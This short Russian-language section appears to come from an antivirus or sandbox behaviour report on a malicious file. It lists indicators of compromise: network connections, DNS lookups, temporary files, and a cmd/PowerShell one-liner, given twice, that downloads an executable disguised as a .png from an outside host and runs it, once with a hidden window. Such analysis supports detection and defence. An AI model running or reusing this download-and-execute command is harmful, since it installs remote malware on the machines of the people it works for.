Техническая информация
- https://my.vndx.com/images/dde60c5776c175c54d23d2b0c.png как %temp%\blwsqeq.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://my.vndx.com/images/dde60c5776c175c54d23d2b0c.png','%TMP%\Blwsqeq.exe');Start-Process '%TMP%\Blwsqeq.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1408
- %TEMP%\1286789.cvr
- 'my.#ndx.com':443
- 'ca#####.rapidssl.com':80
- http://ca#####.rapidssl.com/RapidSSLTLSRSACAG1.crt
- 'my.#ndx.com':443
- DNS ASK my.#ndx.com
- DNS ASK ca#####.rapidssl.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://my.vndx.com/images/dde60c5776c175c54d23d2b0c.png','%TMP%\Blwsqeq.exe');Start-Process '%TMP%\Blwsqeq.exe'; (со скрытым окном)